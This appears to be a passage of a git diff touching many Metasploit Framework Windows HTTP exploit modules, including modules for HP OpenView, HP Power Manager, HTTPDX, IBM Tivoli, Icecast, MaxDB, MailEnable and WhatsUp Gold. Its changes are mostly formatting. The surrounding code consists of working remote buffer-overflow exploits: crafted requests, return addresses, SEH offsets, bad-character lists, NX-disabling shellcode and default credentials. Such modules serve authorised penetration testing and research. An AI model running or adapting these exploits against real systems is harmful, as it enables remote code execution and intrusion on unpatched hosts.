Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. @@ -41,15 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 9 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -63,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => "GET", 'data' => "Host=&Oid=#{sploit}&Community=&Action=&Context=Snmp", }, 3) - + handler end diff --git a/modules/exploits/windows/http/hp_nnm_toolbar.rb b/modules/exploits/windows/http/hp_nnm_toolbar.rb index 981c79a3b7..eb76ab990e 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. - By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute - arbitrary code. + By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -41,15 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 7 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -62,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/OvCgi/Toolbar.exe?" + sploit, 'method' => "GET", }, 5) - + handler diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 5581ca02d0..7c5ab67f0c 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,15 +14,15 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Hewlett-Packard Power Manager Administration Buffer Overflow.', 'Description' => %q{ This module exploits a stack overflow in Hewlett-Packard Power Manager 4.2. - Sending a specially crafted POST request with an overly long Login string, an - attacker may be able to execute arbitrary code. + Sending a specially crafted POST request with an overly long Login string, an + attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -40,15 +44,14 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP4 English', { 'Ret' => 0x75022ac4 } ], ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 4 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -59,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit[635,4] = [target.ret].pack('V') sploit[639,32] = make_nops(32) sploit[671,payload.encoded.length] = payload.encoded - + data = "HtmlOnly=true&Login=" + sploit + "+passwd&Password=&loginButton=Submit+Login" req = "POST /goform/formLogin HTTP/1.1\r\n" @@ -71,9 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") sock.put(req) - sleep(5) + sleep(5) handler disconnect - end - + end + end diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index fe18ccb421..55ae5a380b 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## ## # httpdx_handlepeer.rb @@ -23,20 +27,20 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTPDX h_handlepeer() Function Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The + This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The vulnerability is caused due to a boundary error within the "h_handlepeer()" function in http.cpp. By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code. }, 'Author' => - [ + [ 'Pankaj Kohli <pankaj208[at]gmail.com>', # Original exploit [see References] 'Trancer <mtrancer[at]gmail.com>', # Metasploit implementation 'jduck' @@ -63,17 +67,18 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', 'Targets' => - [ - [ 'httpdx 1.4 - Windows XP SP3 English', - { - 'Offset' => 476, - 'Ret' => 0x63b81a07, # seh handler (pop/pop/ret in n.dll) - 'Readable' => 0x63b80131 # early in n.dll - } - ] - ], + [ + [ 'httpdx 1.4 - Windows XP SP3 English', + { + 'Offset' => 476, + 'Ret' => 0x63b81a07, # seh handler (pop/pop/ret in n.dll) + 'Readable' => 0x63b80131 # early in n.dll + } + ] + ], 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( [ Opt::RPORT(80) ], self.class ) end def check @@ -82,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + # this will need to be updated if httpdx is ever fixed :) if (resp and (m = resp.match(/Server: httpdx\/(.*) \(Win32\)/))) then print_status("HTTPDX version detected : #{m[1]}") @@ -95,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + uri = payload.encoded if target['Offset'] > payload_space pad = target['Offset'] - payload_space @@ -107,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote # extra causing hitting end of the stack uri << rand_text_alphanumeric(1024) uri[620,4] = [target['Readable']].pack('V') # arg (must be readable) - + sploit = rand_text(3) + "=" + uri request = "GET /" + sploit + " HTTP/1.1\r\n" # an empty host header gives us 512 bytes in the client structure @@ -123,5 +128,5 @@ class Metasploit3 < Msf::Exploit::Remote disconnect handler end - + end diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 031292b14d..cd702c6ec3 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -143,7 +143,7 @@ For now, that will have to be done manually. def exploit - # Use a copy of the target + # Use a copy of the target mytarget = target if (target['auto']) @@ -243,18 +243,6 @@ For now, that will have to be done manually. return nil end - def generate_ascii_sled(badchars) - sled = "" - (0..255).each do |ch| - str = [ch].pack('C') - if badchars.include?(str) - sled << "A" - else - sled << str - end - end - return sled - end end diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index a3eeb29b70..cdb8ebecfc 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IA WebMail 3.x Buffer Overflow', 'Description' => %q{ - This exploits a stack overflow in the IA WebMail server. + This exploits a stack overflow in the IA WebMail server. This exploit has not been tested against a live system at this time. - }, 'Author' => [ 'hdm' ], 'Version' => '$Revision$', @@ -35,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '2757'], [ 'BID', '8965'], [ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'], - ], 'Privileged' => false, 'Payload' => @@ -43,11 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", - }, 'Platform' => 'win', - 'Targets' => - [ + 'Targets' => + [ [ 'IA WebMail 3.x', { @@ -64,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending request...") send_request_raw({ - 'uri' => + 'uri' => "/" + ("o" * target['Length']) + "META" + [target.ret].pack('V') + diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index 6fd3169509..6c6508d1ae 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -7,17 +11,16 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow', 'Description' => %q{ - This is a stack overflow exploit for IBM Tivoli Provisioning Manager + This is a stack overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X. }, 'Author' => 'toto', @@ -39,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 0x200, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a", - 'Prepend' => + 'Prepend' => # Disable NX on 2k3 to upload data on the stack # (service crashes if the stack is switched to the heap) "\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB @@ -61,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['TPMfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }], # tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll) @@ -69,12 +72,12 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'May 02 2007', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(443), - OptBool.new('SSL', [true, 'Use SSL', true]), - ], self.class ) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + ], self.class ) end def exploit @@ -129,10 +132,10 @@ class Metasploit3 < Msf::Exploit::Remote # ret 4: (increase the stack pointer to allow a jump back in the payload) # add esp, 1ch - # retn + # retn auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V') - auth[ 2184, 2 ] = "\xeb\x56" # jmp payload + auth[ 2184, 2 ] = "\xeb\x56" # jmp payload # ret 5: (create an executable heap - huge one) @@ -217,12 +220,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', - 'headers' => + 'headers' => { 'Authorization' => "Basic #{auth}" } }, 5) - + handler end diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index af3fe02674..983a8bc709 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). + This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code. }, 'Author' => [ 'MC' ], @@ -46,28 +44,27 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Sept 24 2007')) - - register_options( [ Opt::RPORT(1581) ], self.class ) + register_options( [ Opt::RPORT(1581) ], self.class ) end def exploit connect - + sploit = "GET /BACLIENT HTTP/1.1\r\n" - sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190) - sploit << [target.ret].pack('V') + payload.encoded - + sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190) + sploit << [target.ret].pack('V') + payload.encoded + print_status("Trying target %s..." % target.name) - + sock.put(sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index 64fd084afe..ee09b0796e 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Icecast (<= 2.0.1) Header Overwrite (win32)', 'Description' => %q{ - This module exploits a buffer overflow in the header parsing + This module exploits a buffer overflow in the header parsing of icecast, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved @@ -36,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote exits, the counter will be left incremented, and eventually the threadpool limit will be maxed. So you can multihit, but only till you fill the threadpool. - + }, 'Author' => [ 'spoonm', 'Luigi Auriemma <aluigi@autistici.org>' ], 'License' => MSF_LICENSE, @@ -47,10 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '10406'], [ 'BID', '11271'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html'], - ], 'Privileged' => false, - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, @@ -62,17 +59,17 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Automatic', { }], ], 'DisclosureDate' => 'Sep 28 2004', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(8000) - ], self.class) + + register_options( + [ + Opt::RPORT(8000) + ], self.class) end # Interesting that ebp is pushed after the local variables, and the line array @@ -85,16 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + # bounce bounce bouncey bounce.. (our chunk gets free'd, so do a little dance) - # jmp 12 + # jmp 12 evul = "\xeb\x0c / HTTP/1.1 #{payload.encoded}\r\n" evul << "Accept: text/html\r\n" * 31; - + # jmp [esp+4] evul << "\xff\x64\x24\x04\r\n" evul << "\r\n" - + sock.put(evul) handler diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index 678360e3f5..226bdc9577 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in InterSystems Cache 2009.1. - By sending a specially crafted GET request, an attacker may be able to execute - arbitrary code. + By sending a specially crafted GET request, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -40,15 +44,14 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP4 English', { 'Offset' => 710, 'Ret' => 0x6ff2791a } ], # libhttpd.dll 2.2.11.0 / pop ebp | pop ebx | ret ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 29 2009')) # Initially...! - - register_options( [ Opt::RPORT(57772) ], self.class ) + register_options( [ Opt::RPORT(57772) ], self.class ) end def exploit @@ -69,5 +72,5 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) handler - end + end end diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index b674831d2c..e615dde73b 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By - posting a long string for the value of 'instancename' in the _maincfgret.cgi + This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By + posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system. }, 'Author' => [ 'MC' ], @@ -47,27 +45,27 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 25 2004')) - - register_options( [ - Opt::RPORT(80), - OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']), - OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']), - ], self.class ) + register_options( + [ + Opt::RPORT(80), + OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']), + OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']), + ], self.class ) end def exploit c = connect - num = rand(65535).to_s - user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" - + num = rand(65535).to_s + user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" + req = "page=notify&origname=&action=return&type=Beeper&instancename=" req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06" req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded @@ -79,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', 'content-type' => 'application/x-www-form-urlencoded', 'data' => req, - 'headers' => + 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, 5) - + handler end diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 068b331406..3408d475a5 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -3,29 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable Authorization Header Buffer Overflow', 'Description' => %q{ - This module exploits a remote buffer overflow in the MailEnable web service. - The vulnerability is triggered when a large value is placed into the Authorization - header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and - MailEnable Professional versions prior to 1.55 are affected. + This module exploits a remote buffer overflow in the MailEnable web service. + The vulnerability is triggered when a large value is placed into the Authorization + header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and + MailEnable Professional versions prior to 1.55 are affected. }, 'Author' => 'David Maciejak <david.maciejak[at]kyxar.fr>', 'License' => MSF_LICENSE, @@ -44,10 +42,10 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x0d\x0a" }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MEHTTPS.exe Universal', { 'Ret' => 0x006c36b7 }], # mehttps.exe - ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 24 2005')) end @@ -55,12 +53,12 @@ class Metasploit3 < Msf::Exploit::Remote def check response = send_request_raw - if response and - response['Server'] and + if response and + response['Server'] and response['Server'] =~ /.*MailEnable/ return Exploit::CheckCode::Appears end - + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index b93097ae39..53b1de2225 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -3,31 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MaxDB WebDBM Database Parameter Overflow', 'Description' => %q{ - This module exploits a stack overflow in the MaxDB WebDBM + This module exploits a stack overflow in the MaxDB WebDBM service. By sending a specially-crafted HTTP request that contains - an overly long database name. A remote attacker could overflow a buffer + an overly long database name. A remote attacker could overflow a buffer and execute arbitrary code on the system with privileges of the wahttp process. - This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27. + This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -51,16 +49,15 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MaxDB 7.6.00.16', { 'Ret' => 0x1005a08f } ], # wapi.dll [ 'MaxDB 7.6.00.27', { 'Ret' => 0x1005b08f } ], # wapi.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 29 2006')) - - register_options( [ Opt::RPORT(9999) ], self.class ) + register_options( [ Opt::RPORT(9999) ], self.class ) end def exploit @@ -77,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote req = "Event=DBM_LOGON&Action=LOGON&Server=#{server}&Database=#{sploit}" req << "&User=#{user}&Password=#{pass}" - res = "POST /webdbm HTTP/1.1\r\n" + "Host: #{rhost}:#{port}\r\n" + res = "POST /webdbm HTTP/1.1\r\n" + "Host: #{rhost}:#{port}\r\n" res << "Content-Length: #{req.length}" + "\r\n\r\n" + req + "\r\n" print_status("Trying target %s..." % target.name) diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 341f87a665..a3af2be03c 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MaxDB WebDBM GET Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the MaxDB WebDBM + This module exploits a stack overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an @@ -31,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote assumes a web root path with the same length as: C:\Program Files\sdb\programs\web\Documents - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -39,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2005-0684'], - [ 'OSVDB', '15816'], + [ 'OSVDB', '15816'], [ 'URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'], [ 'BID', '13368'], ], @@ -49,10 +46,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 2052, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MaxDB 7.5.00.11 / 7.5.00.24', { 'Ret' => 0x1002aa19 }], # wapi.dll ['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll @@ -62,11 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Apr 26 2005', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(9999) - ], self.class) + + register_options( + [ + Opt::RPORT(9999) + ], self.class) end def exploit @@ -80,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote buf[3647, 4] = [target.ret].pack('V') print_status("Trying target address 0x%.8x..." % target.ret) - + send_request_raw({ 'uri' => '/%' + buf }, 5) diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index dfd78bda65..3414f2ccd0 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Minishare 1.4.1 Buffer Overflow', 'Description' => %q{ - This is a simple buffer overflow for the minishare web + This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable. - }, 'Author' => [ 'acaro <acaro@jervus.it>' ], 'License' => BSD_LICENSE, @@ -39,7 +36,6 